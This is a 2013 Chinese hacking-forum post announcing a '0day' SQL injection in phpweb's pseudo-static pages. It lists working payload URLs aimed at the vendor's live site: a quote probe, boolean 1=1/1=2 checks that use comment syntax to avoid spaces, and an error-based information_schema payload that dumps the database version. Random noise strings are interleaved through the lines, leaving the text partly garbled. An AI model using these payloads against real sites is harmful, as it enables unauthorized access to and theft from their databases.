中国网络渗透测试联盟

标题: phpweb伪静态页面注入0day [打印本页]
作者: admin    时间: 2013-1-4 19:46
标题: phpweb伪静态页面注入0day
phpweb所有的整站程序伪静态页面都存在sql注入, z- O1 E  S. a, R
* A1 b4 G; K* G( y1 s4 H2 C. R
主站:http://phpweb.net/
& P* @4 R# j2 P  m* @. U- Z8 m) U4 V加’检测:5 h$ u/ q9 [( c

7 ?3 O. q3 r  \+ h: I2 `  G' Mhttp://www.phpweb.net/down/html/?772′.html
* R2 D$ E+ z' M # R! }. ]$ I8 a; X& x3 |' c
出错$ B& o  `! e8 K4 P. J" D
存在注入。, F( E9 Y+ z: R1 z: e
不能用空格,只能用/*罗- S) N: S; A+ v6 |, J6 J0 E
http://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
0 N3 Z$ M2 y3 t$ s+ d. s* ]% x+ B! q & B( \) ?. Z. t
http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.
! T# `4 X" }7 n2 O/ s  z1 o7 D' O爆数据库版本:4 w4 U$ a" `2 z3 i2 b% L6 O
* W# p5 |! I8 M( X4 _
?& R0 r) r- d1 M) u
14 ]. j) m" W) Q
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
% a, ^6 s4 C1 a, X0 s) O4 y更新日期: 2013-01-03 13:39:50        / T. f; k0 x1 a9 \* C; y




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2